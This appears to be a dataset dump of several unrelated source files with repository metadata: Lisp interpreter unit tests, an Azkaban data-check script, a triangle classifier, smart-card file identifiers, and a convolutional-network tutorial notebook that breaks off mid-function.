        self.assertEqual(2.4, pl.evaluate(pl.parse("(* 0.6 4)")))
    @unittest.skipIf(0 < version < 2, 'multiple args for mul')
    def test_mul_many(self):
        self.assertEqual(60, pl.evaluate(pl.parse("(* 3 4 5)")))
    @unittest.skipIf(0 < version < 2, '')
    def test_div(self):
        self.assertEqual(2.0, pl.evaluate(pl.parse("(/ 8 4)")))
    @unittest.skipIf(0 < version < 2, '')
    def test_floor_div(self):
        # Floor division is expected to floor float operands as well.
        self.assertEqual(2, pl.evaluate(pl.parse("(// 8 4)")))
        self.assertEqual(2, pl.evaluate(pl.parse("(// 9.1 4)")))
    @unittest.skipIf(0 < version < 3, '')
    def test_parse_two_levels(self):
        # NOTE(review): despite the name, this exercises evaluation of a
        # nested expression, not parsing.
        self.assertEqual(13, pl.evaluate(pl.parse(" (+ (* 3 4) (- 2 1))")))
    @unittest.skipIf(0 < version < 3, '')
    def test_parse_three_levels(self):
        self.assertEqual(6, pl.evaluate(pl.parse("(// (+ (* 3 4) (- 2 1)) 2)")))
    @unittest.skipIf(0 < version < 4, '')
    def test_define(self):
        # define returns None; the binding persists across evaluate() calls,
        # which the following assertions rely on.
        self.assertEqual(None, pl.evaluate(pl.parse("(define x 3)")))
        self.assertEqual(7, pl.evaluate(pl.parse("(+ x 4)")))
        self.assertEqual(3, pl.evaluate(pl.parse("x")))
    @unittest.skipIf(0 < version < 4, '')
    def test_set(self):
        self.assertEqual(None, pl.evaluate(pl.parse("(define x 3)")))
        self.assertEqual(3, pl.evaluate(pl.parse("x")))
        self.assertEqual(None, pl.evaluate(pl.parse("(set! x 4)")))
        self.assertEqual(8, pl.evaluate(pl.parse("(+ x 4)")))
    @unittest.skipIf(0 < version < 5, '')
    def test_lambda(self):
        self.assertEqual(None, pl.evaluate(pl.parse("(define square (lambda (x) (* x x)))")))
        self.assertEqual(9, pl.evaluate(pl.parse("(square 3)")))
    @unittest.skipIf(0 < version < 6, '')
    def test_load_file(self):
        # The loaded .lisp fixture is expected to define x — TODO confirm
        # fixture contents; REPL_STARTED is set before loading.
        pl.REPL_STARTED = True
        self.assertEqual(None, pl.load("define_variable_test.lisp"))
        self.assertEqual(3, pl.evaluate(pl.parse("x")))
    @unittest.skipIf(0 < version < 7, '')
    def test_load_file_with_comments(self):
        pl.REPL_STARTED = True
        self.assertEqual(None, pl.load("comments_test.lisp"))
        self.assertEqual(49, pl.evaluate(pl.parse("(square 7)")))
    @unittest.skipIf(version not in [0, 7, 8], '')
    def test_sqrt(self):
        # verify that math functions are loaded properly; only need to verify one
        self.assertEqual(4.0, pl.evaluate(pl.parse("(sqrt 16)")))
    @unittest.skipIf(0 < version < 9, '')
    def test_load_python(self):
        # verify that Python module can be imported properly
        pl.evaluate(pl.parse('(load-python (quote math))'))
        self.assertEqual(4.0, pl.evaluate(pl.parse("(sqrt 16)")))
    @unittest.skipIf(0 < version < 9, '')
    def test_load_python_scope(self):
        pl.REPL_STARTED = True
        pl.load("scope_test.lisp")
        self.assertEqual(3, pl.evaluate(pl.parse("(* 1 pi)")))
        # Compare against Python's real math.pi for the interpreter-side call.
        from math import pi
        self.assertEqual(pi, pl.evaluate(pl.parse("(mul_pi 1)")))
class TestLogic(unittest.TestCase):
    '''Tests for the conditional special forms: if, not, and cond.'''
    @unittest.skipIf(0 < version < 8, '')
    def test_if(self):
        # test "if", "#t", "#f"
        pl.evaluate(pl.parse("(if #t (define x 1) (define x 2))"))
        self.assertEqual(1, pl.evaluate(pl.parse("x")))
        self.assertEqual(None, pl.evaluate(pl.parse("(if #f (define x 3) (define x 4))")))
        self.assertEqual(4, pl.evaluate(pl.parse("x")))
    @unittest.skipIf(0 < version < 8, '')
    def test_not(self):
        # test "if", "#t", "#f"
        self.assertEqual(None, pl.evaluate(pl.parse("(if (not #t) (define x 1) (define x 2))")))
        self.assertEqual(2, pl.evaluate(pl.parse("x")))
        self.assertEqual(None, pl.evaluate(pl.parse("(if (not #f) (define x 3) (define x 4))")))
        self.assertEqual(3, pl.evaluate(pl.parse("x")))
    @unittest.skipIf(0 < version < 8, '')
    def test_cond(self):
        # test "cond", ">", ">" ,"="
        # Defines an absolute-value function covering all three cond branches.
        expr = """
        (define abs (lambda (x)
            (cond ((> x 0) x)
                  ((= x 0) 0)
                  ((< x 0) (- x)))))"""
        self.assertEqual(None, pl.evaluate(pl.parse(expr)))
        self.assertEqual(2, pl.evaluate(pl.parse("(abs 2)")))
        self.assertEqual(3, pl.evaluate(pl.parse("(abs -3)")))
        self.assertEqual(0, pl.evaluate(pl.parse("(abs 0)")))
    @unittest.skipIf(0 < version < 8, '')
    def test_cond_with_else(self):
        # test "cond", "else", "<="
        expr = """
        (define abs2 (lambda (x)
            (cond ((<= x 0) (- x))
                  (else x)
                )))"""
        self.assertEqual(None, pl.evaluate(pl.parse(expr)))
        self.assertEqual(2, pl.evaluate(pl.parse("(abs2 2)")))
        self.assertEqual(3, pl.evaluate(pl.parse("(abs2 -3)")))
        self.assertEqual(0, pl.evaluate(pl.parse("(abs2 0)")))
class TestLists(unittest.TestCase):
    '''Exercise the list primitives cons, car and cdr.'''
    # Chain of cons cells equivalent to the quoted literal '(1 2 3 4),
    # shared by every test in this class.
    CONS_CHAIN = "(define a (cons 1 (cons 2 (cons 3 (cons 4 '())))))"
    @unittest.skipIf(0 < version < 11, '')
    def test_cons(self):
        pl.evaluate(pl.parse(self.CONS_CHAIN))
        expected = pl.evaluate(pl.parse("'(1 2 3 4)"))
        self.assertEqual(expected, pl.evaluate(pl.parse("a")))
    @unittest.skipIf(0 < version < 11, '')
    def test_car(self):
        pl.evaluate(pl.parse(self.CONS_CHAIN))
        self.assertEqual(1, pl.evaluate(pl.parse("(car a)")))
    @unittest.skipIf(0 < version < 11, '')
    def test_cdr(self):
        pl.evaluate(pl.parse(self.CONS_CHAIN))
        expected = pl.evaluate(pl.parse("'(2 3 4)"))
        self.assertEqual(expected, pl.evaluate(pl.parse("(cdr a)")))
if __name__ == '__main__':
    # Discover and run every TestCase defined in this module.
    unittest.main()
| [
"andre.roberge@gmail.com"
] | andre.roberge@gmail.com |
99705d37c4bb2556f9d92625eb8702c25db105fe | e46d06a1642ce01395e81325380708d16fc4c268 | /development/data_supervisor/check_dim.py | a656c65c014145c9726bf78656afb03accd8fab8 | [] | no_license | scluojie/development | f90a954424a145834768a392933e29c72e39f1c5 | 96d439de404571a0d6df321337733b7fb3b1c2ef | refs/heads/main | 2023-09-02T21:58:12.839790 | 2021-11-21T03:57:18 | 2021-11-21T03:57:18 | 430,267,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import subprocess
import sys

from azclient import login, wait_node, get_exec_id
from check_notification import get_yesterday
def check_dim(dt, session_id, exec_id):
    """Run the DIM-layer data-quality check for one partition date.

    Blocks (via the azkaban client) until the "ods_to_dim_db" node of the
    given flow execution has finished, then invokes check_dim.sh.

    :param dt: partition date string forwarded to check_dim.sh
    :param session_id: azkaban session id used for the wait_node API call
    :param exec_id: azkaban execution id of the flow being monitored
    :return: None
    """
    if wait_node(session_id, exec_id, "ods_to_dim_db"):
        # Argument-list form instead of os.system("bash check_dim.sh " + dt):
        # no shell string interpolation, so a dt containing spaces or shell
        # metacharacters cannot break or hijack the command.
        subprocess.run(["bash", "check_dim.sh", dt])
if __name__ == '__main__':
    argv = sys.argv
    # Authenticate against azkaban; every later API call reuses this session.
    session_id = login()
    # The execution id is only obtainable while the original flow is running.
    exec_id = get_exec_id(session_id)
    # Partition date: first CLI argument if supplied, otherwise yesterday.
    dt = argv[1] if len(argv) >= 2 else get_yesterday()
    # Run the data-quality check only when a live execution was found.
    if exec_id:
        check_dim(dt, session_id, exec_id)
| [
"1309077494@qq.com"
] | 1309077494@qq.com |
c7bf8d4a3c0aff487948a67314faa439b18b6655 | 44e90e8fa0170a0a710fe14d745794ac464e2650 | /typeoftriangle.py | 470b42a7dcbadadb8c7a7a96dc3ca800d0c1cdd6 | [] | no_license | ashwin-g-g/Python-tasks-MyCaptain | f94448d70d09c3c00961914025f761bda6c927dc | cefb386d5bd21a48b9fe77a3bcfe6917ee73c1e0 | refs/heads/master | 2020-12-04T19:19:54.935166 | 2020-01-05T06:59:15 | 2020-01-05T06:59:15 | 231,879,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | side1 = input("Enter the 1st side of triangle: ")
side2= input("Enter the 2nd side of triangle: ")
side3= input("Enter the 3rd side of triangle: ")
if side1 == side2 and side2 == side3 and side1 == side3:
print("Equilateral triangle")
elif side1 != side2 and side2 != side3 and side1 != side3:
print("Scalene triangle")
elif side1 == side2 or side2 == side3 or side1 == side3:
print("Isosceles triangle")
| [
"noreply@github.com"
] | noreply@github.com |
d57bdb8960124be53b28f4bd5107c64047f6dc01 | a8809e4b2450abd39c5221397d99d118b190b277 | /src/apdu/FileIdentify.py | 6f75ddfffb646ce4753ce3e8025aebeca86e551a | [] | no_license | 0x554simon/ICCardTool | badecfec14b34178a0f05b7bdcc4785aca354502 | e81a7249ff3c8c69aa515de933a323a93b7808f0 | refs/heads/master | 2021-01-15T09:04:12.822083 | 2016-04-06T11:49:17 | 2016-04-06T11:49:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | #-*-encoding:utf-8-*-
'''
Created on 2016-3-24
@author: ThinkPad
'''
class FileIdentify(object):
    '''
    Well-known file names, stored as lists of byte values, used when
    selecting applications on an IC card.
    ONE PAY : PSE = 1PAY.SYS.DDF01 for PBOC ECC
    TWO PAY : PPSE = 2PAY.SYS.DDF01 for QPBOC
    DEBIT/CREBIT AID eg: A000000333010101,A000000333010102
    '''
    # Derived from the ASCII names; identical byte values to spelling the
    # hex codes out by hand (0x31, 0x50, 0x41, ...).
    PSE = [ord(ch) for ch in "1PAY.SYS.DDF01"]
    PPSE = [ord(ch) for ch in "2PAY.SYS.DDF01"]

    def __init__(self, params):
        '''
        Constructor (params is currently unused).
        '''
| [
"yixiangzhike007@163.com"
] | yixiangzhike007@163.com |
f971ae2ebcfdc1aca2cb4478a9cce077178d7fbc | 3b8383d0b7ea024be7efc0843dca66540e62c6de | /Course04_CNN/Convolution+model+-+Step+by+Step+-+v2.py | 4ba26060297a61bf34be84a2d86e9344e82c175c | [] | no_license | rendorHaevyn/Coursera_Deep_Learning | a178f412e42e2038c3ff1f37540c740082fef868 | 22b4e5ba9ebae807429cd5a6494acb72e2ee425e | refs/heads/master | 2020-03-20T17:01:51.914835 | 2018-11-10T10:38:38 | 2018-11-10T10:38:38 | 137,550,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,522 | py |
# coding: utf-8
# # Convolutional Neural Networks: Step by Step
#
# Welcome to Course 4's first assignment! In this assignment, you will implement convolutional (CONV) and pooling (POOL) layers in numpy, including both forward propagation and (optionally) backward propagation.
#
# **Notation**:
# - Superscript $[l]$ denotes an object of the $l^{th}$ layer.
# - Example: $a^{[4]}$ is the $4^{th}$ layer activation. $W^{[5]}$ and $b^{[5]}$ are the $5^{th}$ layer parameters.
#
#
# - Superscript $(i)$ denotes an object from the $i^{th}$ example.
# - Example: $x^{(i)}$ is the $i^{th}$ training example input.
#
#
# - Lowerscript $i$ denotes the $i^{th}$ entry of a vector.
# - Example: $a^{[l]}_i$ denotes the $i^{th}$ entry of the activations in layer $l$, assuming this is a fully connected (FC) layer.
#
#
# - $n_H$, $n_W$ and $n_C$ denote respectively the height, width and number of channels of a given layer. If you want to reference a specific layer $l$, you can also write $n_H^{[l]}$, $n_W^{[l]}$, $n_C^{[l]}$.
# - $n_{H_{prev}}$, $n_{W_{prev}}$ and $n_{C_{prev}}$ denote respectively the height, width and number of channels of the previous layer. If referencing a specific layer $l$, this could also be denoted $n_H^{[l-1]}$, $n_W^{[l-1]}$, $n_C^{[l-1]}$.
#
# We assume that you are already familiar with `numpy` and/or have completed the previous courses of the specialization. Let's get started!
# ## 1 - Packages
#
# Let's first import all the packages that you will need during this assignment.
# - [numpy](www.numpy.org) is the fundamental package for scientific computing with Python.
# - [matplotlib](http://matplotlib.org) is a library to plot graphs in Python.
# - np.random.seed(1) is used to keep all the random function calls consistent. It will help us grade your work.
# In[1]:
import numpy as np
import h5py
import matplotlib.pyplot as plt
get_ipython().magic('matplotlib inline')
plt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
get_ipython().magic('load_ext autoreload')
get_ipython().magic('autoreload 2')
np.random.seed(1)
# ## 2 - Outline of the Assignment
#
# You will be implementing the building blocks of a convolutional neural network! Each function you will implement will have detailed instructions that will walk you through the steps needed:
#
# - Convolution functions, including:
# - Zero Padding
# - Convolve window
# - Convolution forward
# - Convolution backward (optional)
# - Pooling functions, including:
# - Pooling forward
# - Create mask
# - Distribute value
# - Pooling backward (optional)
#
# This notebook will ask you to implement these functions from scratch in `numpy`. In the next notebook, you will use the TensorFlow equivalents of these functions to build the following model:
#
# <img src="images/model.png" style="width:800px;height:300px;">
#
# **Note** that for every forward function, there is its corresponding backward equivalent. Hence, at every step of your forward module you will store some parameters in a cache. These parameters are used to compute gradients during backpropagation.
# ## 3 - Convolutional Neural Networks
#
# Although programming frameworks make convolutions easy to use, they remain one of the hardest concepts to understand in Deep Learning. A convolution layer transforms an input volume into an output volume of different size, as shown below.
#
# <img src="images/conv_nn.png" style="width:350px;height:200px;">
#
# In this part, you will build every step of the convolution layer. You will first implement two helper functions: one for zero padding and the other for computing the convolution function itself.
# ### 3.1 - Zero-Padding
#
# Zero-padding adds zeros around the border of an image:
#
# <img src="images/PAD.png" style="width:600px;height:400px;">
# <caption><center> <u> <font color='purple'> **Figure 1** </u><font color='purple'> : **Zero-Padding**<br> Image (3 channels, RGB) with a padding of 2. </center></caption>
#
# The main benefits of padding are the following:
#
# - It allows you to use a CONV layer without necessarily shrinking the height and width of the volumes. This is important for building deeper networks, since otherwise the height/width would shrink as you go to deeper layers. An important special case is the "same" convolution, in which the height/width is exactly preserved after one layer.
#
# - It helps us keep more of the information at the border of an image. Without padding, very few values at the next layer would be affected by pixels as the edges of an image.
#
# **Exercise**: Implement the following function, which pads all the images of a batch of examples X with zeros. [Use np.pad](https://docs.scipy.org/doc/numpy/reference/generated/numpy.pad.html). Note if you want to pad the array "a" of shape $(5,5,5,5,5)$ with `pad = 1` for the 2nd dimension, `pad = 3` for the 4th dimension and `pad = 0` for the rest, you would do:
# ```python
# a = np.pad(a, ((0,0), (1,1), (0,0), (3,3), (0,0)), 'constant', constant_values = (..,..))
# ```
# In[10]:
# GRADED FUNCTION: zero_pad
def zero_pad(X, pad):
    """
    Surround every image in the batch X with `pad` rows/columns of zeros on
    the height and width axes only; batch and channel axes are untouched.

    Argument:
    X -- python numpy array of shape (m, n_H, n_W, n_C) representing a batch of m images
    pad -- integer, amount of padding around each image on vertical and horizontal dimensions

    Returns:
    X_pad -- padded image of shape (m, n_H + 2*pad, n_W + 2*pad, n_C)
    """
    m, n_H, n_W, n_C = X.shape
    # Allocate the enlarged zero canvas (same dtype as X, matching np.pad's
    # behaviour) and paste the original batch into its centre.
    X_pad = np.zeros((m, n_H + 2 * pad, n_W + 2 * pad, n_C), dtype=X.dtype)
    X_pad[:, pad:pad + n_H, pad:pad + n_W, :] = X

    return X_pad
# In[11]:
# Smoke-test zero_pad: pad a small random batch with 2 zeros per border and
# compare the original and padded shapes/values.
np.random.seed(1)
x = np.random.randn(4, 3, 3, 2)
x_pad = zero_pad(x, 2)
print ("x.shape =", x.shape)
print ("x_pad.shape =", x_pad.shape)
print ("x[1,1] =", x[1,1])
print ("x_pad[1,1] =", x_pad[1,1])
# Visualise one channel of the original and padded image side by side.
fig, axarr = plt.subplots(1, 2)
axarr[0].set_title('x')
axarr[0].imshow(x[0,:,:,0])
axarr[1].set_title('x_pad')
axarr[1].imshow(x_pad[0,:,:,0])
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **x.shape**:
# </td>
# <td>
# (4, 3, 3, 2)
# </td>
# </tr>
# <tr>
# <td>
# **x_pad.shape**:
# </td>
# <td>
# (4, 7, 7, 2)
# </td>
# </tr>
# <tr>
# <td>
# **x[1,1]**:
# </td>
# <td>
# [[ 0.90085595 -0.68372786]
# [-0.12289023 -0.93576943]
# [-0.26788808 0.53035547]]
# </td>
# </tr>
# <tr>
# <td>
# **x_pad[1,1]**:
# </td>
# <td>
# [[ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]]
# </td>
# </tr>
#
# </table>
# ### 3.2 - Single step of convolution
#
# In this part, implement a single step of convolution, in which you apply the filter to a single position of the input. This will be used to build a convolutional unit, which:
#
# - Takes an input volume
# - Applies a filter at every position of the input
# - Outputs another volume (usually of different size)
#
# <img src="images/Convolution_schematic.gif" style="width:500px;height:300px;">
# <caption><center> <u> <font color='purple'> **Figure 2** </u><font color='purple'> : **Convolution operation**<br> with a filter of 2x2 and a stride of 1 (stride = amount you move the window each time you slide) </center></caption>
#
# In a computer vision application, each value in the matrix on the left corresponds to a single pixel value, and we convolve a 3x3 filter with the image by multiplying its values element-wise with the original matrix, then summing them up and adding a bias. In this first step of the exercise, you will implement a single step of convolution, corresponding to applying a filter to just one of the positions to get a single real-valued output.
#
# Later in this notebook, you'll apply this function to multiple positions of the input to implement the full convolutional operation.
#
# **Exercise**: Implement conv_single_step(). [Hint](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.sum.html).
#
# In[14]:
# GRADED FUNCTION: conv_single_step
def conv_single_step(a_slice_prev, W, b):
    """
    Apply one filter defined by parameters W on a single slice (a_slice_prev) of the output activation
    of the previous layer.

    Arguments:
    a_slice_prev -- slice of input data of shape (f, f, n_C_prev)
    W -- Weight parameters contained in a window - matrix of shape (f, f, n_C_prev)
    b -- Bias parameters contained in a window - matrix of shape (1, 1, 1)

    Returns:
    Z -- a scalar value, result of convolving the sliding window (W, b) on a slice x of the input data
    """
    # Element-wise product between a_slice_prev and W (not a matrix product).
    s = np.multiply(a_slice_prev, W)
    # Sum over all entries of the volume s.
    Z = np.sum(s)
    # Extract the single bias value before adding it. The original added the
    # (1, 1, 1) array b directly, which broadcast Z into a (1, 1, 1) array and
    # contradicted the documented scalar return type.
    Z = Z + float(b.item())

    return Z
# In[15]:
# Smoke-test conv_single_step: one random 4x4x3 receptive field, one random
# filter of the same shape, and a (1, 1, 1) bias.
np.random.seed(1)
a_slice_prev = np.random.randn(4, 4, 3)
W = np.random.randn(4, 4, 3)
b = np.random.randn(1, 1, 1)

Z = conv_single_step(a_slice_prev, W, b)
print("Z =", Z)
# **Expected Output**:
# <table>
# <tr>
# <td>
# **Z**
# </td>
# <td>
# -6.99908945068
# </td>
# </tr>
#
# </table>
# ### 3.3 - Convolutional Neural Networks - Forward pass
#
# In the forward pass, you will take many filters and convolve them on the input. Each 'convolution' gives you a 2D matrix output. You will then stack these outputs to get a 3D volume:
#
# <center>
# <video width="620" height="440" src="images/conv_kiank.mp4" type="video/mp4" controls>
# </video>
# </center>
#
# **Exercise**: Implement the function below to convolve the filters W on an input activation A_prev. This function takes as input A_prev, the activations output by the previous layer (for a batch of m inputs), F filters/weights denoted by W, and a bias vector denoted by b, where each filter has its own (single) bias. Finally you also have access to the hyperparameters dictionary which contains the stride and the padding.
#
# **Hint**:
# 1. To select a 2x2 slice at the upper left corner of a matrix "a_prev" (shape (5,5,3)), you would do:
# ```python
# a_slice_prev = a_prev[0:2,0:2,:]
# ```
# This will be useful when you will define `a_slice_prev` below, using the `start/end` indexes you will define.
# 2. To define a_slice you will need to first define its corners `vert_start`, `vert_end`, `horiz_start` and `horiz_end`. This figure may be helpful for you to find how each of the corner can be defined using h, w, f and s in the code below.
#
# <img src="images/vert_horiz_kiank.png" style="width:400px;height:300px;">
# <caption><center> <u> <font color='purple'> **Figure 3** </u><font color='purple'> : **Definition of a slice using vertical and horizontal start/end (with a 2x2 filter)** <br> This figure shows only a single channel. </center></caption>
#
#
# **Reminder**:
# The formulas relating the output shape of the convolution to the input shape is:
# $$ n_H = \lfloor \frac{n_{H_{prev}} - f + 2 \times pad}{stride} \rfloor +1 $$
# $$ n_W = \lfloor \frac{n_{W_{prev}} - f + 2 \times pad}{stride} \rfloor +1 $$
# $$ n_C = \text{number of filters used in the convolution}$$
#
# For this exercise, we won't worry about vectorization, and will just implement everything with for-loops.
# In[28]:
# GRADED FUNCTION: conv_forward
def conv_forward(A_prev, W, b, hparameters):
    """
    Forward pass of a convolution layer.

    Arguments:
    A_prev -- activations of the previous layer, shape (m, n_H_prev, n_W_prev, n_C_prev)
    W -- filter weights, shape (f, f, n_C_prev, n_C)
    b -- biases, shape (1, 1, 1, n_C)
    hparameters -- python dictionary containing "stride" and "pad"

    Returns:
    Z -- conv output, shape (m, n_H, n_W, n_C)
    cache -- values needed by conv_backward()
    """
    (m, n_H_prev, n_W_prev, n_C_prev) = A_prev.shape
    (f, f, n_C_prev, n_C) = W.shape
    stride = hparameters['stride']
    pad = hparameters['pad']

    # Output spatial dimensions: floor((prev - f + 2*pad) / stride) + 1.
    n_H = int((n_H_prev - f + 2 * pad) / stride) + 1
    n_W = int((n_W_prev - f + 2 * pad) / stride) + 1

    Z = np.zeros((m, n_H, n_W, n_C))
    A_prev_pad = zero_pad(A_prev, pad)

    for i in range(m):                              # each example in the batch
        a_prev_pad = A_prev_pad[i]
        for h in range(n_H):                        # output rows
            vert_start = h * stride
            vert_end = vert_start + f
            for w in range(n_W):                    # output columns
                horiz_start = w * stride
                horiz_end = horiz_start + f
                # One receptive field, shared by every filter at (h, w).
                a_slice_prev = a_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :]
                for c in range(n_C):                # each filter / output channel
                    Z[i, h, w, c] = conv_single_step(a_slice_prev, W[..., c], b[..., c])

    # Sanity-check the output volume before caching inputs for backprop.
    assert(Z.shape == (m, n_H, n_W, n_C))
    cache = (A_prev, W, b, hparameters)

    return Z, cache
# In[29]:
# Smoke-test conv_forward: batch of 10 4x4x3 inputs, eight 2x2 filters,
# padding 2 and stride 2; print summary values of the output and cache.
np.random.seed(1)
A_prev = np.random.randn(10,4,4,3)
W = np.random.randn(2,2,3,8)
b = np.random.randn(1,1,1,8)
hparameters = {"pad" : 2,
               "stride": 2}

Z, cache_conv = conv_forward(A_prev, W, b, hparameters)
print("Z's mean =", np.mean(Z))
print("Z[3,2,1] =", Z[3,2,1])
print("cache_conv[0][1][2][3] =", cache_conv[0][1][2][3])
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **Z's mean**
# </td>
# <td>
# 0.0489952035289
# </td>
# </tr>
# <tr>
# <td>
# **Z[3,2,1]**
# </td>
# <td>
# [-0.61490741 -6.7439236 -2.55153897 1.75698377 3.56208902 0.53036437
# 5.18531798 8.75898442]
# </td>
# </tr>
# <tr>
# <td>
# **cache_conv[0][1][2][3]**
# </td>
# <td>
# [-0.20075807 0.18656139 0.41005165]
# </td>
# </tr>
#
# </table>
#
# Finally, CONV layer should also contain an activation, in which case we would add the following line of code:
#
# ```python
# # Convolve the window to get back one output neuron
# Z[i, h, w, c] = ...
# # Apply activation
# A[i, h, w, c] = activation(Z[i, h, w, c])
# ```
#
# You don't need to do it here.
#
# ## 4 - Pooling layer
#
# The pooling (POOL) layer reduces the height and width of the input. It helps reduce computation, as well as helps make feature detectors more invariant to its position in the input. The two types of pooling layers are:
#
# - Max-pooling layer: slides an ($f, f$) window over the input and stores the max value of the window in the output.
#
# - Average-pooling layer: slides an ($f, f$) window over the input and stores the average value of the window in the output.
#
# <table>
# <td>
# <img src="images/max_pool1.png" style="width:500px;height:300px;">
# <td>
#
# <td>
# <img src="images/a_pool.png" style="width:500px;height:300px;">
# <td>
# </table>
#
# These pooling layers have no parameters for backpropagation to train. However, they have hyperparameters such as the window size $f$. This specifies the height and width of the fxf window you would compute a max or average over.
#
# ### 4.1 - Forward Pooling
# Now, you are going to implement MAX-POOL and AVG-POOL, in the same function.
#
# **Exercise**: Implement the forward pass of the pooling layer. Follow the hints in the comments below.
#
# **Reminder**:
# As there's no padding, the formulas binding the output shape of the pooling to the input shape is:
# $$ n_H = \lfloor \frac{n_{H_{prev}} - f}{stride} \rfloor +1 $$
# $$ n_W = \lfloor \frac{n_{W_{prev}} - f}{stride} \rfloor +1 $$
# $$ n_C = n_{C_{prev}}$$
# In[31]:
# GRADED FUNCTION: pool_forward
def pool_forward(A_prev, hparameters, mode = "max"):
    """
    Forward pass of the pooling layer.

    Arguments:
    A_prev -- input data, shape (m, n_H_prev, n_W_prev, n_C_prev)
    hparameters -- python dictionary containing "f" (window size) and "stride"
    mode -- pooling type, "max" or "average"

    Returns:
    A -- pooled output, shape (m, n_H, n_W, n_C)
    cache -- (A_prev, hparameters), used by the pooling backward pass
    """
    m, n_H_prev, n_W_prev, n_C_prev = A_prev.shape
    f = hparameters["f"]
    stride = hparameters["stride"]

    # No padding in pooling: out = floor((prev - f) / stride) + 1; the channel
    # count is unchanged because each channel is pooled independently.
    n_H = int(1 + (n_H_prev - f) / stride)
    n_W = int(1 + (n_W_prev - f) / stride)
    n_C = n_C_prev

    A = np.zeros((m, n_H, n_W, n_C))

    for i in range(m):                              # batch examples
        for h in range(n_H):                        # output rows
            vert_start = h * stride
            vert_end = vert_start + f
            for w in range(n_W):                    # output columns
                horiz_start = w * stride
                horiz_end = horiz_start + f
                for c in range(n_C):                # channels
                    window = A_prev[i, vert_start:vert_end, horiz_start:horiz_end, c]
                    if mode == "max":
                        A[i, h, w, c] = np.max(window)
                    elif mode == "average":
                        A[i, h, w, c] = np.mean(window)

    cache = (A_prev, hparameters)
    assert(A.shape == (m, n_H, n_W, n_C))

    return A, cache
# In[32]:
# Smoke-test pool_forward: pool the same random batch with f=3, stride=2 in
# both supported modes and print the results.
np.random.seed(1)
A_prev = np.random.randn(2, 4, 4, 3)
hparameters = {"stride" : 2, "f": 3}

A, cache = pool_forward(A_prev, hparameters)
print("mode = max")
print("A =", A)
print()
A, cache = pool_forward(A_prev, hparameters, mode = "average")
print("mode = average")
print("A =", A)
# **Expected Output:**
# <table>
#
# <tr>
# <td>
# A =
# </td>
# <td>
# [[[[ 1.74481176 0.86540763 1.13376944]]]
#
#
# [[[ 1.13162939 1.51981682 2.18557541]]]]
#
# </td>
# </tr>
# <tr>
# <td>
# A =
# </td>
# <td>
# [[[[ 0.02105773 -0.20328806 -0.40389855]]]
#
#
# [[[-0.22154621 0.51716526 0.48155844]]]]
#
# </td>
# </tr>
#
# </table>
#
# Congratulations! You have now implemented the forward passes of all the layers of a convolutional network.
#
# The remainer of this notebook is optional, and will not be graded.
#
# ## 5 - Backpropagation in convolutional neural networks (OPTIONAL / UNGRADED)
#
# In modern deep learning frameworks, you only have to implement the forward pass, and the framework takes care of the backward pass, so most deep learning engineers don't need to bother with the details of the backward pass. The backward pass for convolutional networks is complicated. If you wish however, you can work through this optional portion of the notebook to get a sense of what backprop in a convolutional network looks like.
#
# When in an earlier course you implemented a simple (fully connected) neural network, you used backpropagation to compute the derivatives with respect to the cost to update the parameters. Similarly, in convolutional neural networks you can to calculate the derivatives with respect to the cost in order to update the parameters. The backprop equations are not trivial and we did not derive them in lecture, but we briefly presented them below.
#
# ### 5.1 - Convolutional layer backward pass
#
# Let's start by implementing the backward pass for a CONV layer.
#
# #### 5.1.1 - Computing dA:
# This is the formula for computing $dA$ with respect to the cost for a certain filter $W_c$ and a given training example:
#
# $$ dA += \sum _{h=0} ^{n_H} \sum_{w=0} ^{n_W} W_c \times dZ_{hw} \tag{1}$$
#
# Where $W_c$ is a filter and $dZ_{hw}$ is a scalar corresponding to the gradient of the cost with respect to the output of the conv layer Z at the hth row and wth column (corresponding to the dot product taken at the ith stride left and jth stride down). Note that at each time, we multiply the the same filter $W_c$ by a different dZ when updating dA. We do so mainly because when computing the forward propagation, each filter is dotted and summed by a different a_slice. Therefore when computing the backprop for dA, we are just adding the gradients of all the a_slices.
#
# In code, inside the appropriate for-loops, this formula translates into:
# ```python
# da_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :] += W[:,:,:,c] * dZ[i, h, w, c]
# ```
#
# #### 5.1.2 - Computing dW:
# This is the formula for computing $dW_c$ ($dW_c$ is the derivative of one filter) with respect to the loss:
#
# $$ dW_c += \sum _{h=0} ^{n_H} \sum_{w=0} ^ {n_W} a_{slice} \times dZ_{hw} \tag{2}$$
#
# Where $a_{slice}$ corresponds to the slice which was used to generate the acitivation $Z_{ij}$. Hence, this ends up giving us the gradient for $W$ with respect to that slice. Since it is the same $W$, we will just add up all such gradients to get $dW$.
#
# In code, inside the appropriate for-loops, this formula translates into:
# ```python
# dW[:,:,:,c] += a_slice * dZ[i, h, w, c]
# ```
#
# #### 5.1.3 - Computing db:
#
# This is the formula for computing $db$ with respect to the cost for a certain filter $W_c$:
#
# $$ db = \sum_h \sum_w dZ_{hw} \tag{3}$$
#
# As you have previously seen in basic neural networks, db is computed by summing $dZ$. In this case, you are just summing over all the gradients of the conv output (Z) with respect to the cost.
#
# In code, inside the appropriate for-loops, this formula translates into:
# ```python
# db[:,:,:,c] += dZ[i, h, w, c]
# ```
#
# **Exercise**: Implement the `conv_backward` function below. You should sum over all the training examples, filters, heights, and widths. You should then compute the derivatives using formulas 1, 2 and 3 above.
# In[ ]:
# In[37]:
def conv_backward(dZ, cache):
    """
    Implement the backward propagation for a convolution function.

    Arguments:
    dZ -- gradient of the cost with respect to the output of the conv layer (Z),
          numpy array of shape (m, n_H, n_W, n_C)
    cache -- cache of values needed for conv_backward(), output of conv_forward()

    Returns:
